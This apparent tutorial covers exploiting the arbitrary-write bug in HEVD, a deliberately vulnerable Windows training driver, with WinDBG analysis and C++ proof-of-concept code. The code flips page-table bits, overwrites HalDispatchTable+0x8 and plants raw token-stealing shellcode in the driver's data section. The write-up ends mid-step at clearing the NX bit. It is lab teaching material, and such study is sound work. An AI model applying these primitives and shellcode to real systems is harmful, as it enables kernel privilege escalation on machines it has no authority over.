Kernel Exploitation Primer 0x5 - Arbitrary Write (Write-What-Where)
In this post, I am going to discuss another popular vulnerability class called Arbitrary Write, or Write-What-Where. It was a really interesting topic, and I've tried to document every technique I used here. Let’s get started without further ado.
Write-What-Where Vulnerability Analysis
HEVD has a dedicated handler for the Arbitrary Write vulnerability (also called Write-What-Where), ArbitraryWriteIoctlHandler, whose IOCTL code is 0x22200B.
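As a quick sanity check, the IOCTL value can be rebuilt from its parts. The sketch below restates the bit layout of the CTL_CODE macro in portable C++ so it compiles without the Windows SDK; the function number 0x802 and METHOD_NEITHER are taken from the POC later in this post, and MakeIoctl and the k-prefixed constants are names made up for this illustration.

```cpp
#include <cassert>
#include <cstdint>

// Values as defined in the Windows SDK headers, restated here so the sketch
// builds without <Windows.h>.
constexpr uint32_t kFileDeviceUnknown = 0x22;
constexpr uint32_t kMethodNeither     = 3;
constexpr uint32_t kFileAnyAccess     = 0;

// Same bit layout as the CTL_CODE macro:
// (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
constexpr uint32_t MakeIoctl(uint32_t deviceType, uint32_t function,
                             uint32_t method, uint32_t access) {
    return (deviceType << 16) | (access << 14) | (function << 2) | method;
}

constexpr uint32_t kWriteWhatWhereIoctl =
    MakeIoctl(kFileDeviceUnknown, 0x802, kMethodNeither, kFileAnyAccess);

// 0x220000 | 0x2008 | 0x3 == 0x22200B, the value seen in the handler.
static_assert(kWriteWhatWhereIoctl == 0x22200B, "IOCTL mismatch");
```

The low two bits (3) encode METHOD_NEITHER, which means the driver receives the raw user-mode pointer and has to validate it itself.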
Basically, this vulnerability allows us to write arbitrary data (what) to an arbitrary memory location (where). So we have control over the data we need to write and also the location where we need to write, hence Write-What-Where vulnerability.
Let’s analyze ArbitraryWriteIoctlHandler in IDA. We can see it makes a call to the TriggerArbitraryWrite function (1️⃣) and passes the user input (2️⃣) to it.
Diving into the function, IDA labels the pointer to the user input (RCX) as UserWriteWhatWhere (1️⃣), and the function later copies that pointer into the R14 register (2️⃣). Now both RCX and R14 hold the pointer to the user input.
Moving on, there is a call to the ProbeForRead() API (1️⃣), which checks that a user-mode buffer actually resides in the user address space and is correctly aligned. This API takes 3 arguments:
- The first argument is the user-space address, and we know RCX still holds the user input address.
- The second argument is the length of the buffer, passed in RDX. In the instructions above (2️⃣) there is a lea edx, [rsi+10h] instruction, and before that (3️⃣) RSI is XORed with itself, so it is zero. lea only computes the address expression without dereferencing it, so EDX = 0 + 0x10 (a mov with the same operand would read memory at that address instead). The length is therefore 0x10 bytes.
- The final argument is Alignment, the required alignment of the user-mode buffer in bytes. Here it appears to be 1, i.e. byte alignment (4️⃣).
void ProbeForRead(
    [in] const volatile VOID *Address,
    [in] SIZE_T              Length,
    [in] ULONG               Alignment
);
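To make the scope of this check concrete, here is a simplified user-mode model of what ProbeForRead() validates. It is only a sketch: the real routine raises an exception rather than returning a status, and the value used for the user-space limit (kUserProbeAddress) is an assumed x64 value of nt!MmUserProbeAddress that should be verified in a debugger. ModelProbeForRead and ProbeResult are hypothetical names.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Assumed x64 value of nt!MmUserProbeAddress (verify on the target build).
constexpr uint64_t kUserProbeAddress = 0x00007FFFFFFF0000ULL;

enum class ProbeResult { Ok, Misaligned, AccessViolation };

// Simplified model: checks only the [address, address + length) range it is
// given. `alignment` is assumed to be a power of two.
ProbeResult ModelProbeForRead(uint64_t address, size_t length, uint32_t alignment) {
    if (length == 0) {
        return ProbeResult::Ok;  // zero-length buffers are not checked
    }
    if (address & (alignment - 1)) {
        return ProbeResult::Misaligned;
    }
    uint64_t end = address + length;
    if (end < address || end > kUserProbeAddress) {
        return ProbeResult::AccessViolation;  // wraps or leaves user space
    }
    return ProbeResult::Ok;
}
```

The important detail for this vulnerability is what the probe does not cover: only the 0x10-byte structure is checked, not the two pointers stored inside it.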
Moving forward, after the ProbeForRead() call there are a few more operations. We already know that R14 holds the pointer to the user input; by dereferencing it, the function copies the first 8 bytes into RBX (1️⃣) and the second 8 bytes into RDI (2️⃣). So the input is probably a structure with two 8-byte members. Finally, it also stores the pointer to the user input (R14) in R9 (3️⃣).
Here comes the interesting part. At the end of this block, two major operations happen:
- RBX holds the first 8 bytes (the first member of the structure) of the user input. The function dereferences it and copies the value it points to into RAX (1️⃣).
- RDI holds the second 8 bytes (the second member of the structure) of the user input. The function copies the value in RAX to the address in RDI, overwriting whatever is stored there.
RBX represents WHAT (a pointer to the value to write), and RDI represents WHERE (the address to write to) in this arbitrary write scenario. In other words, the 8 bytes at the address given by the second member of the user-provided structure (RDI) are overwritten with the 8 bytes read from the address given by the first member (RBX). Neither pointer is validated, so both can point anywhere, including kernel space.
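The behaviour described above boils down to a single unchecked copy. The following user-mode model is a sketch of that logic based on the disassembly walkthrough, not the driver's actual source; ModelTriggerArbitraryWrite and the WriteWhatWhere struct are illustrative names.

```cpp
#include <cassert>
#include <cstdint>

struct WriteWhatWhere {
    uint64_t* What;   // pointer to the 8-byte value to copy
    uint64_t* Where;  // destination address
};

// Model of the vulnerable copy: *Where = *What, with neither pointer validated.
void ModelTriggerArbitraryWrite(const WriteWhatWhere* input) {
    uint64_t* what  = input->What;   // first member, loaded into RBX
    uint64_t* where = input->Where;  // second member, loaded into RDI
    *where = *what;                  // read through RBX, store through RDI
}
```

Note that WHAT is dereferenced too, so to write a chosen constant the caller has to pass the address of a variable holding that constant.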
Below is a quick POC which writes whatever value is stored at the pointer 0x4141414141414141 to 0x4242424242424242. Of course this will fail because the addresses are not valid, but you get the idea.
// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <Windows.h>
#include <stdio.h>
#include <psapi.h>

#define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)

typedef struct _WRITE_WHAT_WHERE {
    void* WHAT;   // pointer to the value to write
    void* WHERE;  // address to write to
} WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;

int main()
{
    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver",
        GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);
    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %lu\n", GetLastError());
        return 1;
    }

    WRITE_WHAT_WHERE input;
    input.WHAT = (LPVOID)(0x4141414141414141);
    input.WHERE = (LPVOID)(0x4242424242424242);

    printf("[+] Calling TriggerArbitraryWrite....");
    // DeviceIoControl returns a BOOL (nonzero on success), not an NTSTATUS
    BOOL success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);
    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return 1;
    }
    return 0;
}
Dynamic Analysis via WinDBG
Let’s discuss WHAT we are going to write and WHERE we are going to write it. It’s obvious that we want to write our shellcode, but WHERE? We need a location in kernel space that is safe to overwrite and from which we can execute the shellcode without causing a BSOD. This is crucial when writing in the kernel: we must not overwrite existing data that might be in use.
There is a popular way to exploit a WRITE-WHAT-WHERE in the Windows kernel using HalDispatchTable. The Hardware Abstraction Layer (HAL) dispatch table is a table of function pointers that serves as an interface between kernel-mode components (the OS) and the underlying hardware.
There is an undocumented Windows API function called NtQueryIntervalProfile(), which internally calls KeQueryIntervalProfile().
Checking KeQueryIntervalProfile(), we can see that the pointer stored at nt!HalDispatchTable+0x8 is moved to RAX (1️⃣), but instead of a direct call through nt!HalDispatchTable+0x8 itself, there is a call to nt!guard_dispatch_icall (2️⃣) (more on this below).
As I said earlier, HalDispatchTable is a table of pointers. The second pointer is the one we are going to overwrite with our shellcode address, and then we call NtQueryIntervalProfile() to invoke it.
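The idea of hijacking a dispatch-table slot can be modelled in plain user-mode C++. Everything below is a hypothetical stand-in: ModelDispatchTable is not the real HAL structure layout, and ModelKeQueryIntervalProfile only imitates the "call through the pointer at +0x8" behaviour described above.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

using HalRoutine = int (*)();

int OriginalQuery() { return 0; }
int Payload()       { return 0x1337; }

// Hypothetical stand-in for nt!HalDispatchTable: the first slot is treated as
// a header value and the second slot is the pointer being hijacked.
struct ModelDispatchTable {
    uintptr_t  Version;
    HalRoutine QuerySystemInformation;
};

// The hijacked slot sits one pointer-size into the table (0x8 on x64).
static_assert(offsetof(ModelDispatchTable, QuerySystemInformation) == sizeof(uintptr_t),
              "second slot expected right after the first");

// Stand-in for KeQueryIntervalProfile: calls whatever the second slot holds.
int ModelKeQueryIntervalProfile(const ModelDispatchTable& table) {
    return table.QuerySystemInformation();
}
```

Once the slot is overwritten, any caller that dispatches through it runs the attacker-chosen routine, which is why a single 8-byte write is enough to redirect execution.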
However, as we noticed, there is no direct call through nt!HalDispatchTable+0x8; the call goes through nt!guard_dispatch_icall, which is part of Kernel Control-Flow Guard (kCFG). So if we replace this pointer (nt!HalDispatchTable+0x8) with a pointer to user-space shellcode, nt!guard_dispatch_icall will block the call.
kCFG requires Virtualization-Based Security (VBS) and HVCI to be fully enforced, and HVCI is disabled in the current scenario. kCFG maintains a bitmap that records the valid kernel function entry points, which the kernel uses to verify that an indirect call or jump target is legitimate before allowing execution.
Basically, it checks whether the target placed in RAX (1️⃣ in the image above) is marked as valid in that bitmap. Since HVCI is disabled, we don’t need to worry about the bitmap check. However, kCFG also checks whether the target is a user-space or a kernel-space address, and it does this by looking at the address itself, not at the PTE. So even if we flip the PTE bit from “U” to “K”, it does not matter; the call to our user-space shellcode will still be blocked.
Let’s summarize what we know so far: if we WRITE our shellcode address to nt!HalDispatchTable+0x8, we can call NtQueryIntervalProfile() to run whatever that pointer references. But kCFG will block the kernel from executing a user-space address. Anyway, let’s give this a try and see it in practice.
Usually we use ROP gadgets to bypass SMEP & VBS by finding the PTE of the user-space shellcode, flipping the “U” flag to “K”, and then executing the shellcode. In the previous Type Confusion & UAF vulnerabilities we used a stack pivot in order to execute those ROP gadgets. In this scenario we have a WRITE primitive, but we can also use it as a READ.
Yes, we can WRITE WHATever value WHEREever we want, so what if we read the PTE base address (WHAT) and write it to a user-space buffer (WHERE)? Then we can flip the “U” flag to “K” and write the modified value back in the next step.
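The read-via-write trick is easier to see when both primitives are wrapped in small helpers. This is a user-mode sketch: ModelTriggerArbitraryWrite stands in for the DeviceIoControl call into the driver, and ArbitraryRead / ArbitraryWrite are hypothetical helper names, not functions from the POC.

```cpp
#include <cassert>
#include <cstdint>

struct WriteWhatWhere {
    uint64_t* What;
    uint64_t* Where;
};

// Stand-in for the IOCTL: copies 8 bytes from *What to *Where.
void ModelTriggerArbitraryWrite(const WriteWhatWhere& in) {
    *in.Where = *in.What;
}

// Read: WHAT is the address of interest, WHERE is a local buffer.
uint64_t ArbitraryRead(uint64_t* target) {
    uint64_t out = 0;
    ModelTriggerArbitraryWrite({target, &out});
    return out;
}

// Write: WHAT points at a local copy of the value, WHERE is the target.
void ArbitraryWrite(uint64_t* target, uint64_t value) {
    ModelTriggerArbitraryWrite({&value, target});
}
```

The only difference between the two is which side of the copy is attacker-owned memory; the driver cannot tell them apart.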
Method (1) - VBS & SMEP Bypass (Failed)
A quick recap: the MiGetPteAddress() function contains the PTE base address, which can be read from MiGetPteAddress+0x13, so this is what we are trying to read now.
Step 1: Read the PTE base address
- Allocated 8 bytes of user-space memory called PteBase using VirtualAlloc(); this is where the PTE base address will be written.
- Configured the WRITE_WHAT_WHERE structure: WHAT is the address of MiGetPteAddress+0x13, computed from the function offset and the NT base address (which is retrieved using EnumDeviceDrivers()), and WHERE is PteBase.
- Then we call DeviceIoControl() with the structure as input.
- After the call, we read the value stored in PteBase, which is the base address of the PTEs.
LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read MiGetPteAddress+0x13: %p\n", PteBase);

WRITE_WHAT_WHERE input;
input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // MiGetPteAddress+0x13
input.WHERE = (LPVOID)(PteBase);

printf("[+] Calling TriggerArbitraryWrite....");
BOOL success = DeviceIoControl(
    hDriver,
    WRITE_WHAT_WHERE_IOCTL,
    &input,
    sizeof(input),
    nullptr,
    0,
    nullptr,
    nullptr);
if (success) {
    printf("success\n");
}
else {
    printf("failed\n");
    return 1;
}

// The driver copied the 8 bytes at MiGetPteAddress+0x13 into our buffer
LPVOID* basePTE = (LPVOID*)PteBase;
printf("[+] Base of PTE: %p\n", *basePTE);
Placed a breakpoint on the call to the TriggerArbitraryWrite function; checking RCX, we can see the 2 values we sent.
Moving forward to the arbitrary write (1️⃣): first it copies the value stored at the address in RBX (MiGetPteAddress+0x13) into RAX. Stepping over this instruction, we can confirm that RAX holds the PTE base address (2️⃣). Then it writes the value in RAX to the address in RDI (3️⃣), and we can confirm that RDI (PteBase) now contains the PTE base address (4️⃣).
We can confirm this in the console as well, which printed the PTE base address. That completes Step 1.
Step 2: PTE of Shellcode address
- Now that we have the PTE base address, we can allocate a region for our shellcode (lpMemory).
- Do the calculation (MiGetPte(), the same function we used in previous posts) to get the PTE address of our shellcode (actualPTE).
- Then, using TriggerArbitraryWrite, we can read that address to get the value stored there, which is the PFN and the flags of our shellcode page (pfnShellcode).
LPVOID lpMemory = VirtualAlloc(NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
printf("[+] Shellcode address: %p\n", lpMemory);
memcpy(lpMemory, shellcode, sizeof(shellcode));
uintptr_t ShellcodePte = MiGetPte(lpMemory);
printf("[+] PTE calculated shellcode address: %p\n", (void*)ShellcodePte);
uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
printf("[+] Actual PTE of shellcode address: %p\n", actualPTE);
getchar();
LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
input.WHAT = (LPVOID)(actualPTE);
input.WHERE = (LPVOID)(pfnShellcode);
printf("[+] Calling TriggerArbitraryWrite (2)....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
LPVOID* pfn = (LPVOID*)pfnShellcode;
printf("[+] PFN of shellcode: %p\n", *pfn);
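The PTE address calculation used in this step can be checked in isolation. The sketch below mirrors the shift and mask performed by MiGetPte(); PteOffset and PteAddress are illustrative names, and kExamplePteBase is the old fixed (pre-randomization) PTE base, used here purely as an example value since the real base has to be leaked at run time as shown above.

```cpp
#include <cassert>
#include <cstdint>

// Offset of the PTE for `va` relative to the PTE base:
// one 8-byte PTE per 4 KB page, hence the shift by 9 and the 8-byte mask.
constexpr uint64_t PteOffset(uint64_t va) {
    return (va >> 9) & 0x7FFFFFFFF8ULL;
}

// Full PTE address once the (randomized) PTE base is known.
constexpr uint64_t PteAddress(uint64_t pteBase, uint64_t va) {
    return pteBase + PteOffset(va);
}

// Example value only: the fixed PTE base used before the base was randomized.
constexpr uint64_t kExamplePteBase = 0xFFFFF68000000000ULL;

static_assert(PteOffset(0x401000) == 0x2008, "page 0x401 maps to PTE slot 0x401");
```

For instance, with that example base the PTE of 0xFFFFF78000000000 works out to 0xFFFFF6FBC0000000.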
Executed the POC and got the shellcode address and the PTE of the shellcode address.
Checking the page table entry of the shellcode address, we can see that the PTE address (0xFFFFA2816C3B3C80) is the same as what we retrieved through our POC. Note down the value inside it.
Stepping over the getchar(), the POC retrieved the PTE bits of the shellcode address; comparing them with the image above, both are the same.
Step 3: Flipping “U/S” bit to “K” bit
- Now that we have the PTE bits/flags, we can flip the “U/S” bit to “K” by clearing bit 2 (0x4). Because the bit is currently set, subtracting 0x4 or XORing with 0x4 both work (modifiedPFN).
- Then, by calling TriggerArbitraryWrite() with the address of the shellcode PTE as WHERE and a pointer to the modified value as WHAT, we can flip the flag.
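As a side note on the bit manipulation itself, here is a small sketch of clearing the U/S bit with a mask rather than a subtraction. The PTE values are made up for illustration, and MakeSupervisor is a hypothetical helper name.

```cpp
#include <cassert>
#include <cstdint>

// Bit 2 of an x64 PTE is U/S: 1 = user-accessible, 0 = supervisor only.
constexpr uint64_t kPteUserBit = 1ULL << 2;

// Clearing with a mask gives the same result whether or not the bit was set.
constexpr uint64_t MakeSupervisor(uint64_t pte) {
    return pte & ~kPteUserBit;
}

// Made-up PTE value with the low flags 0x867 (U/S set).
static_assert(MakeSupervisor(0x0000000123456867ULL) == 0x0000000123456863ULL,
              "U/S bit cleared");
```

Subtracting 0x4 gives the same result only while the bit is set; applied a second time it would borrow from the neighbouring bits, which is why the masked form is the safer habit.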
uintptr_t modifiedPFN = (uintptr_t)*pfn - 0x4;
printf("[+] Modified PFN of shellcode with \"K\" flag: %p\n", modifiedPFN);
input.WHAT = (LPVOID)(&modifiedPFN);
input.WHERE = (LPVOID)(actualPTE);
printf("[+] Calling TriggerArbitraryWrite (3)....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
getchar();
Executed the POC and we got the success message; let’s check that in WinDBG.
The value is modified and the flag is flipped to “K”.
Step 4: Overwriting HalDispatchTable+0x8
- Let’s overwrite the HalDispatchTable+0x8 pointer with our shellcode address using the same method.
- I retrieved the offset of HalDispatchTable (0x00c00a60), and we already have the NT base address; adding those (plus 0x8) gives the actual address, which is the location we are going to overwrite.
- The user-space shellcode address (lpMemory) is the value we are going to write there.
input.WHAT = (LPVOID)(&lpMemory);
input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // nt!HalDispatchTable + 0x8
printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", lpMemory);
printf("[+] Calling TriggerArbitraryWrite (4)....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
Placed a breakpoint on the call to TriggerArbitraryWrite and checked the arguments: WHAT contains a pointer to our shellcode address, WHERE is the HalDispatchTable+0x8 address, and the PTE of the shellcode is already flipped to the “K” flag.
Continuing the execution, we got success from the driver.
Checking the HalDispatchTable, we can confirm the second pointer is overwritten with our shellcode address.
Step 5: Execute NtQueryIntervalProfile()
- Now that everything is in place, the final step is to call NtQueryIntervalProfile(). Since it’s an NT call, we need to retrieve its address; I used the classic method of GetProcAddress() and GetModuleHandle() to do that.
- And finally invoked NtQueryIntervalProfile() with appropriate arguments.
pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) {
printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
return 1;
}
printf("[+] Found ntdll!NtQueryIntervalProfile\n");
printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
getchar();
ULONG x = 0;
NtQueryIntervalProfile(
0x1337,
&x
);
Placed a breakpoint on KeQueryIntervalProfile(), because NtQueryIntervalProfile() calls it internally.
The breakpoint on nt!KeQueryIntervalProfile() got hit as expected (1️⃣), and I started walking through the instructions. We can see the pointer at HalDispatchTable+0x8 is moved to RAX (2️⃣). Checking the value in RAX (3️⃣), we can confirm it is our user-space shellcode address. Moving on, it makes the call to nt!guard_dispatch_icall with our shellcode address (4️⃣).
Stepping into nt!guard_dispatch_icall, we can see there is a test instruction on the target address, and the jump that follows depends on the sign flag (SF) it sets.
- A user-space address is typically in the range 0x0000000000000000 - 0x00007FFFFFFFFFFF; bit 63 is always 0, so SF is set to 0.
- A kernel-space address is in the range 0xFFFF800000000000 - 0xFFFFFFFFFFFFFFFF; bit 63 is 1, so SF is set to 1.
- Basically, the test instruction copies bit 63 of the address into SF, and the following conditional jump uses SF to decide whether it is a user-space or a kernel-space address. Since this is a user-space address, we can see SF is 0 and the jump was taken.
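The sign-flag check described in the list above is equivalent to interpreting the target address as a signed 64-bit integer. A minimal sketch of that logic follows; IsKernelAddress is a name chosen for this example and is not something exported by the kernel.

```cpp
#include <cassert>
#include <cstdint>

// Mirrors `test rax, rax` followed by a branch on SF:
// SF is a copy of bit 63, which is set only for kernel-half addresses.
constexpr bool IsKernelAddress(uint64_t target) {
    return static_cast<int64_t>(target) < 0;
}

static_assert(!IsKernelAddress(0x00007FFFFFFFFFFFULL), "top of user space");
static_assert(IsKernelAddress(0xFFFF800000000000ULL), "bottom of kernel space");
```

Because the decision depends only on the numeric value of the pointer, no change to page-table bits can make a user-space address pass it.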
Since the target was identified as a user-space address, it ended up in a BSOD. This is why I mentioned at the beginning that changing the “U/S” bit to “K” does not help: nt!guard_dispatch_icall does not look at the PTE. So we need to find another way to execute our shellcode.
Method (2) - Driver’s Code Cave
The second method is to write our shellcode to a kernel-space location that does not disturb other kernel components. The most common way is to look at the .data section of the driver itself and check whether there is any space left at the end of the section, basically looking for a code cave. From the driver’s header, we can see the virtual address of .data.
0: kd> !dh hevd
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
8664 machine (X64)
7 number of sections
5D1B4BB0 time date stamp Tue Jul 2 05:18:56 2019
0 file pointer to symbol table
0 number of symbols
F0 size of optional header
22 characteristics
Executable
App can handle >2gb addresses
[::]
SECTION HEADER #3
.data name
80018 virtual size
3000 virtual address
200 size of raw data
1400 file pointer to raw data
0 file pointer to relocation table
0 file pointer to line numbers
0 number of relocations
0 number of line numbers
C8000040 flags
Initialized Data
Not Paged
(no align specified)
Read Write
The .data region is readable and writable but not executable, and it has enough space for the shellcode. It also has some data written at the beginning, so I skipped some bytes (0x20) to be sure we are not overwriting anything else. From the PTE of the target address we can see it does not have the “E” flag, so we need to add that.
Step 1: Finding HEVD base address
- We are planning to write our shellcode to the .data section of the loaded HEVD driver, so we need to find its base address as well.
- Modified the getbaseaddress() function which I had been using until now. It gets the base addresses of all the drivers using EnumDeviceDrivers(), retrieves each driver’s name using GetDeviceDriverBaseNameW(), and compares it with the name of the driver we are looking for, which is passed as an argument.
// whatwhere.cpp : This file contains the 'main' function. Program execution begins and ends there.
//
#include <Windows.h>
#include <stdio.h>
#include <psapi.h>   // EnumDeviceDrivers, GetDeviceDriverBaseNameW

PVOID getbaseaddress(LPCWSTR name)
{
    LPVOID* pImageBase;
    DWORD ImageSize = 0;
    WCHAR driverName[1024];
    LPVOID driverBase = nullptr;

    // First call only asks how many bytes the list of image bases needs
    EnumDeviceDrivers(nullptr, 0, &ImageSize);
    pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    if (!pImageBase || !EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize)) {
        return nullptr;
    }

    int driver_count = ImageSize / sizeof(pImageBase[0]);
    for (int i = 0; i < driver_count; i++) {
        // The size argument is a count of characters (WCHARs), not bytes
        GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(driverName[0]));
        if (!wcscmp(name, driverName)) {
            driverBase = pImageBase[i];
            break;
        }
    }
    VirtualFree(pImageBase, 0, MEM_RELEASE);
    return driverBase;
}

int main()
{
    LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
    printf("[+] Nt base address: %p\n", nt_addr);
    LPVOID hevd_addr = getbaseaddress(L"HEVD.sys");
    printf("[+] HEVD base address: %p\n", hevd_addr);
    return 0;
}
It worked perfectly, we can retrieve the base address of NT and also HEVD driver.
Step 2: Writing Shellcode to Kernel-space
- Now that we have the HEVD base address, we can locate the region where we are going to write our shellcode, which is HEVD + 0x3000 + 0x20.
- Since we can write only 8 bytes at a time, I made a for loop which sends 8 bytes (of shellcode) at a time to the kernel-space address (HEVD + 0x3000 + 0x20) by calling TriggerArbitraryWrite. The shellcode is padded with 0xff bytes so that its length is a multiple of 8.
- So shellcode_start is the kernel-space address where we write the shellcode (it advances by 8 on every iteration), and I also kept a copy of the original address as kernelShellcode.
// Step 2
LPVOID shellcode_start = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
LPVOID kernelShellcode = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);
BYTE shellcode[] = {
0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
};
size_t size = sizeof(shellcode);
size_t num_chunks = size / 8;
uint64_t* chunks = new uint64_t[num_chunks];
for (size_t i = 0; i < num_chunks; i++) {
std::memcpy(&chunks[i], &shellcode[i * 8], 8);
input.WHAT = (LPVOID)(&chunks[i]);
input.WHERE = (LPVOID)(shellcode_start);
printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
}
delete[] chunks;
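The loop above relies on the shellcode length being a multiple of 8, because size / 8 rounds down. As a hedged alternative, the chunking could round up and pad the tail automatically. The helper below is a sketch, not part of the original POC; ToQwords is a made-up name and the 0x90 padding byte is an arbitrary choice.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Splits a payload into 8-byte values, padding the final chunk with 0x90
// so that a payload of any length can be written 8 bytes at a time.
std::vector<uint64_t> ToQwords(const uint8_t* data, size_t size) {
    if (size == 0) {
        return {};
    }
    size_t count = (size + 7) / 8;                 // round up, not down
    std::vector<uint8_t> padded(count * 8, 0x90);  // pre-filled with padding
    std::memcpy(padded.data(), data, size);
    std::vector<uint64_t> out(count);
    std::memcpy(out.data(), padded.data(), padded.size());
    return out;
}
```

Each element of the returned vector can then be passed as WHAT (by address) while WHERE advances by 8 per iteration, exactly as in the loop above.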
Executed the POC, and we can see the address of our shellcode in the kernel, and it started writing our shellcode to that location.
Checking that address after the execution, we can see our shellcode is written here.
Step 3: PTE & PTE bits of the shellcode
- This step is the same as what we did in “Method (1)”: we read MiGetPteAddress+0x13 to get the PTE base address (basePTE). We are doing this because the region where we have written our shellcode is just RW and we need RWX.
- Then calculate the PTE address of our shellcode using MiGetPte() (the same function I used previously) and store the actual PTE address of the shellcode in actualPTE.
- Then we read the value at actualPTE to get the PTE bits (pfn) for the next operation.
LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);
input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13); // MiGetPteAddress+0x13
input.WHERE = (LPVOID)(PteBase);
printf("[+] Calling TriggerArbitraryWrite....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
LPVOID* basePTE = (LPVOID*)PteBase;
printf("[+] Base address of PTE: %p\n", *basePTE);
uintptr_t ShellcodePte = MiGetPte(kernelShellcode);
uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
printf("[+] PTE of shellcode address: %p\n", actualPTE);
LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
input.WHAT = (LPVOID)(actualPTE);
input.WHERE = (LPVOID)(pfnShellcode);
printf("[+] Calling TriggerArbitraryWrite....");
success = DeviceIoControl(
hDriver,
WRITE_WHAT_WHERE_IOCTL,
&input,
sizeof(input),
nullptr,
0,
nullptr,
nullptr);
if (success) {
printf("success\n");
}
else {
printf("failed\n");
return 1;
}
LPVOID* pfn = (LPVOID*)pfnShellcode;
printf("[+] PFN of shellcode address: %p\n", *pfn);
Executing the POC, we get the PTE address of the shellcode and also read the value. Cross-verified with WinDBG as well.
Step 4: Clear no-eXecute bit in PTE
- Now that we have the PTE bits/flags, we need to clear the no-eXecute (NX) bit, which is bit 63 of the PTE. This can be done with an AND operation with 0x0FFFFFFFFFFFFFFF, which clears the top four bits including NX (0x7FFFFFFFFFFFFFFF would clear only NX). The result is the value with the “E” flag (modifiedPFN).
- Then we call TriggerArbitraryWrite and write the modified value (modifiedPFN) to the PTE address (actualPTE) of the shellcode.
